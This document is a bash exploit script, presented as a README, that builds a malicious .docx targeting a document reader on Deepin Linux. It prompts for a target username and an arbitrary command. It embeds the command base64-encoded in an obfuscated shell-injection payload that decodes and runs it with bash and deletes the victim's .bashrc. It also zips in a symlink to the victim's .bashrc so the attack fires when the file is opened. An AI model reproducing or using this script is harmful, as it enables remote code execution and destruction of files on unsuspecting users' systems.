README.md
Rendering markdown...
#!/bin/bash
myBanner(){
echo "
╔╦╗┌─┐┌─┐┌─┐┬┌┐┌ ╦═╗┌─┐┌─┐┌┬┐┌─┐┬─┐
║║├┤ ├┤ ├─┘││││───╠╦╝├┤ ├─┤ ││├┤ ├┬┘
═╩╝└─┘└─┘┴ ┴┘└┘ ╩╚═└─┘┴ ┴─┴┘└─┘┴└─
╦═╗╔═╗╔═╗ ╔═╗─┐ ┬┌─┐┬ ┌─┐┬┌┬┐
╠╦╝║ ║╣ ║╣ ┌┴┬┘├─┘│ │ ││ │
╩╚═╚═╝╚═╝ ╚═╝┴ └─┴ ┴─┘└─┘┴ ┴
0-day
[Affected Operating System: Deepin Linux]
-by Febin (@febin_nj)
"
}
checkPandoc(){
if [ $(which pandoc) ]
then
echo "[+] Pandoc is installed!"
else
echo "[-] Pandoc is not installed! Install pandoc to run this exploit.."
exit
fi
}
mainProgram(){
printf "
[ This Exploit will craft a malicious document (.docx) from the specified TEXT file and store the malicious docx under output/ directory ]
"
mkdir output 2>/dev/null
printf " [>] Path to your TEXT file (default = ./sample.txt): "
read html_file
html_file=${html_file:-./sample.txt}
printf " [>] Enter the target username: "
read username
printf " [>] Enter the oneliner command to execute on target: "
read cmd
if [ -e "$html_file" ]
then
cp "$html_file" out.html
else
echo "[-] The specified txt file doesn't exist!"
exit
fi
b64cmd=$(echo "$cmd"|base64)
payload="<p>/dev/null;\${IFS}c\l\e\a\r;echo\${IFS}${b64cmd}|b\a\s\e\${NULL}64\${IFS}-d|b\${NULL}a\s\h;r\m\${IFS}/home/${username}/.b\a\s\h\r\${NULL}c;e\x\i\t #</p>"
echo "${payload}$(printf '\n') $(cat out.html)" > out.html
pandoc out.html -o output/mal.docx
#pandoc output/mal.docx -o output/mal.html
rm -rf out.html
mkdir word 2>/dev/null
ln -s /home/${username}/.bashrc word/temp.html
zip -u -y output/mal.docx word/temp.html >/dev/null
rm -rf word/
echo "[+] Malicious document is written to: $(realpath output/mal.docx)"
}
myBanner
checkPandoc
mainProgram